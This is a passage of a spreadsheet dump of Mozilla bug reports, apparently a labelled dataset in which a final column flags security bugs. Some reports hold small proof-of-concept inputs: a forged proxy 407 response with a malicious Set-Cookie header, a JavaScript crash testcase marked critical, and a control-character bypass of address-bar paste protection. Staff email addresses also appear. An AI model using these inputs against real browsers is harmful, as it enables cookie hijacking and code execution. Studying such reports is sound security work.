    #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&amp;, mozilla::gfx::StrokeOptions const&amp;, mozilla::gfx::DrawOptions const&amp;) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12
    #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11
    #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13
    #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13
    #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14
    #18 0x1a432b56061a  (&lt;unknown module&gt;)</t>
        </is>
      </c>
      <c r="X6206" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6207">
      <c r="A6207" t="n">
        <v>516470</v>
      </c>
      <c r="B6207" t="inlineStr">
        <is>
          <t>2009-09-14 11:47:49 -0700</t>
        </is>
      </c>
      <c r="C6207" t="inlineStr">
        <is>
          <t>Internationalize www.mozilla.org</t>
        </is>
      </c>
      <c r="D6207" t="inlineStr">
        <is>
          <t>2012-09-05 05:54:18 -0700</t>
        </is>
      </c>
      <c r="E6207" t="n">
        <v>1</v>
      </c>
      <c r="F6207" t="n">
        <v>1</v>
      </c>
      <c r="G6207" t="n">
        <v>5</v>
      </c>
      <c r="H6207" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6207" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J6207" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6207" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6207" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6207" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6207" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6207" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6207" t="inlineStr"/>
      <c r="Q6207" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6207" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6207" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6207" t="n">
        <v>1</v>
      </c>
      <c r="U6207" t="n">
        <v>0</v>
      </c>
      <c r="V6207" t="n">
        <v>7</v>
      </c>
      <c r="W6207" t="inlineStr">
        <is>
          <t>The new www.mozilla.org is not internationalized and cannot be localized in result.
It's PHP template based and I'm planning to work on making it i18ned. However if someone has more time now and can pick it up, feel free to takeover.</t>
        </is>
      </c>
      <c r="X6207" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6208">
      <c r="A6208" t="n">
        <v>1189552</v>
      </c>
      <c r="B6208" t="inlineStr">
        <is>
          <t>2015-07-30 16:06:50 -0700</t>
        </is>
      </c>
      <c r="C6208" t="inlineStr">
        <is>
          <t>New blog for win10 Participation needed</t>
        </is>
      </c>
      <c r="D6208" t="inlineStr">
        <is>
          <t>2015-07-31 06:08:46 -0700</t>
        </is>
      </c>
      <c r="E6208" t="n">
        <v>1</v>
      </c>
      <c r="F6208" t="n">
        <v>1</v>
      </c>
      <c r="G6208" t="n">
        <v>5</v>
      </c>
      <c r="H6208" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6208" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J6208" t="inlineStr">
        <is>
          <t>IT-Managed Tools</t>
        </is>
      </c>
      <c r="K6208" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6208" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6208" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6208" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6208" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6208" t="inlineStr">
        <is>
          <t xml:space="preserve">[kanban:https://webops.kanbanize.com/ctrl_board/2/1490] </t>
        </is>
      </c>
      <c r="Q6208" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6208" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6208" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6208" t="n">
        <v>1</v>
      </c>
      <c r="U6208" t="n">
        <v>0</v>
      </c>
      <c r="V6208" t="n">
        <v>3</v>
      </c>
      <c r="W6208" t="inlineStr">
        <is>
          <t>Please spin up new blog with Sandstone theme and make the URL: blog.mozilla.org/control-z
this is to be our Mozilla Participation site where we communicate to users how to support the campaign to motivate MSFT to change the default actions in win10
Marking P1 since this is very timely and we need to get it live ASAP. Apologies for the urgent request.
Please make Chelsea Novak and Mary Colvig admins
cnovak@mozilla.com
mary@mozilla.com
And please let us know if there's anything else needed.</t>
        </is>
      </c>
      <c r="X6208" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6209">
      <c r="A6209" t="n">
        <v>1095859</v>
      </c>
      <c r="B6209" t="inlineStr">
        <is>
          <t>2014-11-07 20:50:08 -0800</t>
        </is>
      </c>
      <c r="C6209" t="inlineStr">
        <is>
          <t>Cookie injection by Proxy with 407 response</t>
        </is>
      </c>
      <c r="D6209" t="inlineStr">
        <is>
          <t>2015-07-09 06:07:32 -0700</t>
        </is>
      </c>
      <c r="E6209" t="n">
        <v>1</v>
      </c>
      <c r="F6209" t="n">
        <v>1</v>
      </c>
      <c r="G6209" t="n">
        <v>3</v>
      </c>
      <c r="H6209" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6209" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6209" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6209" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6209" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6209" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6209" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6209" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6209" t="inlineStr">
        <is>
          <t>[adv-main35+][adv-esr31.4+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q6209" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6209" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6209" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T6209" t="n">
        <v>1</v>
      </c>
      <c r="U6209" t="n">
        <v>0</v>
      </c>
      <c r="V6209" t="n">
        <v>25</v>
      </c>
      <c r="W6209" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Steps to reproduce:
1. Set up a HTTP proxy in Firefox.
2. Navigate to https://mail.google.com.
    Chrome actually sends a CONNECT request:
        CONNECT mail.google.com:443 HTTP/1.1
	Host: mail.google.com
3. The proxy responds a 407 message, including Set-Cookie headers.
    HTTP/1.1 407 Proxy Authentication Required
    Proxy-Authenticate: Basic realm=”auth"
    Set-Cookie: SID=malicious; domain=.mail.google.com; 
Actual results:
Firefox mistakenly accepts the malicious cookies.
Expected results:
Firefox should ignore such Set-Cookie headers.
This bug occurs in ./netwerk/protocol/http/nsHttpChannel.cpp, line 1244.
1225     if (mTransaction-&gt;ProxyConnectFailed()) {
1226         // Only allow 407 (authentication required) to continue
1227         if (httpStatus != 407)
1228             return ProcessFailedProxyConnect(httpStatus);
1229         // If proxy CONNECT response needs to complete, wait to process connection
1230         // for Strict-Transport-Security.
1231     } else {
1232         // Given a successful connection, process any STS data that's relevant.
1233         rv = ProcessSTSHeader();
1234         MOZ_ASSERT(NS_SUCCEEDED(rv), "ProcessSTSHeader failed, continuing load.");
1235     }
1236 
1237     MOZ_ASSERT(!mCachedContentIsValid);
1238 
1239     ProcessSSLInformation();
1240 
1241     // notify "http-on-examine-response" observers
1242     gHttpHandler-&gt;OnExamineResponse(this);
1243 
1244     SetCookie(mResponseHead-&gt;PeekHeader(nsHttp::Set_Cookie));</t>
        </is>
      </c>
      <c r="X6209" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6210">
      <c r="A6210" t="n">
        <v>899702</v>
      </c>
      <c r="B6210" t="inlineStr">
        <is>
          <t>2013-07-30 11:51:25 -0700</t>
        </is>
      </c>
      <c r="C6210" t="inlineStr">
        <is>
          <t>Android looks for egltrace.so in public directory</t>
        </is>
      </c>
      <c r="D6210" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:46 -0800</t>
        </is>
      </c>
      <c r="E6210" t="n">
        <v>1</v>
      </c>
      <c r="F6210" t="n">
        <v>1</v>
      </c>
      <c r="G6210" t="n">
        <v>3</v>
      </c>
      <c r="H6210" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6210" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6210" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6210" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6210" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6210" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6210" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6210" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6210" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q6210" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6210" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6210" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T6210" t="n">
        <v>1</v>
      </c>
      <c r="U6210" t="n">
        <v>0</v>
      </c>
      <c r="V6210" t="n">
        <v>21</v>
      </c>
      <c r="W6210" t="inlineStr">
        <is>
          <t>On Android, we optionally load "egltrace.so" to load GL tracing functionality.  However, we do that unconditionally, and do it from a location that may be world-writable ("/data/local").
This opens up the possibility of a malicious third-party app dropping an egltrace.so in /data/local, which would then allow it full access to the Firefox app's data.  Very little permissions (and nothing unusual) are needed to allow an app to write to /data/local.</t>
        </is>
      </c>
      <c r="X6210" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6211">
      <c r="A6211" t="n">
        <v>714616</v>
      </c>
      <c r="B6211" t="inlineStr">
        <is>
          <t>2012-01-02 05:51:08 -0800</t>
        </is>
      </c>
      <c r="C6211" t="inlineStr">
        <is>
          <t>Assertion failure: (ptrBits &amp; 0x7) == 0, at ../../jsval.h:873 or Crash [@ compartment] or [@ js::array_shift]</t>
        </is>
      </c>
      <c r="D6211" t="inlineStr">
        <is>
          <t>2013-01-14 08:44:14 -0800</t>
        </is>
      </c>
      <c r="E6211" t="n">
        <v>1</v>
      </c>
      <c r="F6211" t="n">
        <v>1</v>
      </c>
      <c r="G6211" t="n">
        <v>3</v>
      </c>
      <c r="H6211" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6211" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6211" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6211" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6211" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6211" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6211" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6211" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q6211" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6211" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6211" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T6211" t="n">
        <v>1</v>
      </c>
      <c r="U6211" t="n">
        <v>0</v>
      </c>
      <c r="V6211" t="n">
        <v>20</v>
      </c>
      <c r="W6211" t="inlineStr">
        <is>
          <t>The following test crashes/asserts on mozilla-central revision d98fbf3cbd71 (options -m -n -a):
array1 = new Array();
size   = 10;
for (i = 0; i &lt; size; (array1.length)++)
{
  array1.push(array1.shift());
}
Backtrace of crash on opt64:
Program received signal SIGSEGV, Segmentation fault.
compartment (length=8, this=&lt;value optimized out&gt;) at /srv/repos/mozilla-central/js/src/jsgc.h:948
948         return arenaHeader()-&gt;compartment;
(gdb) bt
#0  compartment (length=8, this=&lt;value optimized out&gt;) at /srv/repos/mozilla-central/js/src/jsgc.h:948
#1  writeBarrierPre (length=8, this=&lt;value optimized out&gt;) at ../gc/Barrier-inl.h:123
#2  pre (length=8, this=&lt;value optimized out&gt;) at ../gc/Barrier-inl.h:150
#3  ~HeapValue (length=8, this=&lt;value optimized out&gt;) at ../gc/Barrier-inl.h:99
#4  prepareElementRangeForOverwrite (length=8, this=&lt;value optimized out&gt;) at ../jsobjinlines.h:520
#5  JSObject::setDenseArrayInitializedLength (length=8, this=&lt;value optimized out&gt;) at ../jsobjinlines.h:572
#6  0x000000000042394b in js::array_shift (cx=0x8dd310, argc=&lt;value optimized out&gt;, vp=0x7ffff63fb0a8) at /srv/repos/mozilla-central/js/src/jsarray.cpp:2436
#7  0x0000000000481b39 in CallJSNative (cx=0x8dd310, args=..., construct=&lt;value optimized out&gt;) at ../jscntxtinlines.h:311
#8  js::InvokeKernel (cx=0x8dd310, args=..., construct=&lt;value optimized out&gt;) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:524
#9  0x00000000005eba5b in js::mjit::stubs::SlowCall (f=..., argc=0) at /srv/repos/mozilla-central/js/src/methodjit/InvokeHelpers.cpp:196
#10 0x00007ffff7f42f1f in ?? ()
#11 0x00007ffff7f43186 in ?? ()
#12 0x0000000000000001 in ?? ()
#13 0x0000000000000000 in ?? ()
On 32 bit, the assert is: Assertion failure: addr % Cell::CellSize == 0, at ../../jsgc.h:822</t>
        </is>
      </c>
      <c r="X6211" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6212">
      <c r="A6212" t="n">
        <v>1402896</v>
      </c>
      <c r="B6212" t="inlineStr">
        <is>
          <t>2017-09-25 09:04:48 -0700</t>
        </is>
      </c>
      <c r="C6212" t="inlineStr">
        <is>
          <t>Specially-crafted JavaScript may be pasted into the address bar</t>
        </is>
      </c>
      <c r="D6212" t="inlineStr">
        <is>
          <t>2021-08-16 16:09:25 -0700</t>
        </is>
      </c>
      <c r="E6212" t="n">
        <v>1</v>
      </c>
      <c r="F6212" t="n">
        <v>1</v>
      </c>
      <c r="G6212" t="n">
        <v>2</v>
      </c>
      <c r="H6212" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6212" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6212" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K6212" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L6212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6212" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6212" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6212" t="inlineStr">
        <is>
          <t>[adv-main57+] self-xss mitigation bypass [fxsearch]</t>
        </is>
      </c>
      <c r="Q6212" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6212" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6212" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T6212" t="n">
        <v>1</v>
      </c>
      <c r="U6212" t="n">
        <v>0</v>
      </c>
      <c r="V6212" t="n">
        <v>31</v>
      </c>
      <c r="W6212" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3223.0 Safari/537.36
Steps to reproduce:
1. Visit https://www.bayden.com/test/controlchars.html
2. Select all of the text in the box on the page *except* the first character
3. Copy
4. Go to Address bar.
5. Hit paste.
Actual results:
JavaScript is pasted and executes if enter is hit.
Expected results:
Text up to and including "JavaScript:" should be stripped.
Firefox, like Chrome and IE, attempts to prevent the user from pasting JavaScript into the address bar.
Unfortunately, as discovered in https://crbug.com/766010, these protections can be circumvented by introducing leading control characters into the string.</t>
        </is>
      </c>
      <c r="X6212" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6213">
      <c r="A6213" t="n">
        <v>852530</v>
      </c>
      <c r="B6213" t="inlineStr">
        <is>
          <t>2013-03-19 07:36:09 -0700</t>
        </is>
      </c>
      <c r="C6213" t="inlineStr">
        <is>
          <t>notificationBox is not visible on Linux</t>
        </is>
      </c>
      <c r="D6213" t="inlineStr">
        <is>
          <t>2013-05-16 02:53:22 -0700</t>
        </is>
      </c>
      <c r="E6213" t="n">
        <v>1</v>
      </c>
      <c r="F6213" t="n">
        <v>1</v>
      </c>
      <c r="G6213" t="n">
        <v>2</v>
      </c>
      <c r="H6213" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6213" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6213" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K6213" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6213" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6213" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6213" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6213" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6213" t="inlineStr">
        <is>
          <t>[pdfjs-c-integration][pdfjs-f-fixed-upstream] https://github.com/mozilla/pdf.js/pull/2969</t>
        </is>
      </c>
      <c r="Q6213" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6213" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6213" t="inlineStr">
        <is>
          <t>Firefox 22</t>
        </is>
      </c>
      <c r="T6213" t="n">
        <v>1</v>
      </c>
      <c r="U6213" t="n">
        <v>0</v>
      </c>
      <c r="V6213" t="n">
        <v>13</v>
      </c>
      <c r="W6213" t="inlineStr">
        <is>
          <t>The yellow notification box generated by pdf viewer is not visible. It's visible on Windows and MacOS.
"Unable to get a notification box for the fallback message" is visible in the console log. https://github.com/mozilla/pdf.js/blob/master/extensions/firefox/components/PdfStreamConverter.js#L404</t>
        </is>
      </c>
      <c r="X6213" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6214">
      <c r="A6214" t="n">
        <v>441785</v>
      </c>
      <c r="B6214" t="inlineStr">
        <is>
          <t>2008-06-25 05:10:27 -0700</t>
        </is>
      </c>
      <c r="C6214" t="inlineStr">
        <is>
          <t>crash when closing open rdf files or right click on tree after opening rdf files [@ nsXULTemplateQueryProcessorRDF::CheckIsSeparator]</t>
        </is>
      </c>
      <c r="D6214" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E6214" t="n">
        <v>1</v>
      </c>
      <c r="F6214" t="n">
        <v>1</v>
      </c>
      <c r="G6214" t="n">
        <v>3</v>
      </c>
      <c r="H6214" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6214" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6214" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K6214" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L6214" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6214" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6214" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6214" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6214" t="inlineStr">
        <is>
          <t>[sg:critical?] requires bug 492037</t>
        </is>
      </c>
      <c r="Q6214" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6214" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6214" t="inlineStr">
        <is>
          <t>mozilla1.9.1a2</t>
        </is>
      </c>
      <c r="T6214" t="n">
        <v>1</v>
      </c>
      <c r="U6214" t="n">
        <v>0</v>
      </c>
      <c r="V6214" t="n">
        <v>21</v>
      </c>
      <c r="W6214" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9) Gecko/2008052906 Firefox/3.0
a xul window loading 2 rdf files in a tree.
Absolutely no problem with Flock, under windows (Mozilla/5.0 (Windows;
U; Windows NT 5.1; en-US; rv: 1.8.1.14) Gecko/20080530 Firefox/
2.0.0.14 Flock/1.2.1), that is say that I could see a tree that data
in the second file rdf. Similarly, if we turn opens and closes files
via the appropriate buttons, no crash.
But with , FF3, under windows, my tree retains data in the first rdf
and if you play a little with files rdf (open and then close them and
open them by clicking on the tree etc.) on a Most likely to have
crashes.
Under Ubuntu 8.04, I crash , but no proposal of sending report crashes.
Below, links to the first 4 crashes generated by this window. 
http://crash-stats.mozilla.com/report/index/1d65a463-428a-11dd-a516-001321b13766
http://crash-stats.mozilla.com/report/index/915efac7-428a-11dd-921d-001cc45a2ce4
http://crash-stats.mozilla.com/report/index/915efac7-428a-11dd-921d-001cc45a2ce4
http://crash-stats.mozilla.com/report/index/c5253097-428a-11dd-82e6-001321b13766
Reproducible: Always
Steps to Reproduce:
1.Open a new Firefox 3
2.go to http://test03.christophe-charron.org/public/xul/2008_06_21/2008-02-21-test01.php
3.click on button 1 
4.close the window with rdf file
5.right click on tree
6. do it 2 or 3 times if doesn't crash at the first time</t>
        </is>
      </c>
      <c r="X6214" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6215">
      <c r="A6215" t="n">
        <v>243540</v>
      </c>
      <c r="B6215" t="inlineStr">
        <is>
          <t>2004-05-13 11:52:15 -0700</t>
        </is>
      </c>
      <c r="C6215" t="inlineStr">
        <is>
          <t>Testcase (exploit ?) leaks 2MB/sec and hang Mozilla</t>
        </is>
      </c>
      <c r="D6215" t="inlineStr">
        <is>
          <t>2005-07-20 14:06:55 -0700</t>
        </is>
      </c>
      <c r="E6215" t="n">
        <v>1</v>
      </c>
      <c r="F6215" t="n">
        <v>1</v>
      </c>
      <c r="G6215" t="n">
        <v>2</v>
      </c>
      <c r="H6215" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6215" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J6215" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6215" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6215" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6215" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P6215" t="inlineStr"/>
      <c r="Q6215" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6215" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6215" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6215" t="n">
        <v>1</v>
      </c>
      <c r="U6215" t="n">
        <v>0</v>
      </c>
      <c r="V6215" t="n">
        <v>8</v>
      </c>
      <c r="W6215" t="inlineStr">
        <is>
          <t>Build ID: 20040513 on Win2k &amp; 20040512 on Linux.
Steps to reproduce:
1. Load testcase,
2. Mozilla memory usage grows 2MB/sec and CPU is at 99%</t>
        </is>
      </c>
      <c r="X6215" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6216">
      <c r="A6216" t="n">
        <v>1071025</v>
      </c>
      <c r="B6216" t="inlineStr">
        <is>
          <t>2014-09-22 07:38:52 -0700</t>
        </is>
      </c>
      <c r="C6216" t="inlineStr">
        <is>
          <t>Pinboard "save" button not appearing on treeherder production</t>
        </is>
      </c>
      <c r="D6216" t="inlineStr">
        <is>
          <t>2015-05-20 04:27:36 -0700</t>
        </is>
      </c>
      <c r="E6216" t="n">
        <v>1</v>
      </c>
      <c r="F6216" t="n">
        <v>1</v>
      </c>
      <c r="G6216" t="n">
        <v>7</v>
      </c>
      <c r="H6216" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6216" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6216" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6216" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6216" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6216" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6216" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6216" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6216" t="inlineStr"/>
      <c r="Q6216" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6216" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6216" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6216" t="n">
        <v>1</v>
      </c>
      <c r="U6216" t="n">
        <v>0</v>
      </c>
      <c r="V6216" t="n">
        <v>6</v>
      </c>
      <c r="W6216" t="inlineStr">
        <is>
          <t>1) Go to https://treeherder.mozilla.org/ui/#/jobs?repo=mozilla-central (make sure logged in)
2) Select multiple failing jobs
3) Fill out the pinboard
4) Try to submit the failure classification
Expected:
Save button visible &amp; works.
Actual:
Save button is not visible.
This works on dev, just not production, so this may well be fixed by a grunt build and a re-push to prod, but if not, we need a bug tracking this given it's a blocker.</t>
        </is>
      </c>
      <c r="X6216" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6217">
      <c r="A6217" t="n">
        <v>289204</v>
      </c>
      <c r="B6217" t="inlineStr">
        <is>
          <t>2005-04-05 15:16:36 -0700</t>
        </is>
      </c>
      <c r="C6217" t="inlineStr">
        <is>
          <t>Showing a blocked popup has chrome privs</t>
        </is>
      </c>
      <c r="D6217" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6217" t="n">
        <v>1</v>
      </c>
      <c r="F6217" t="n">
        <v>1</v>
      </c>
      <c r="G6217" t="n">
        <v>3</v>
      </c>
      <c r="H6217" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6217" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6217" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6217" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6217" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6217" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6217" t="inlineStr">
        <is>
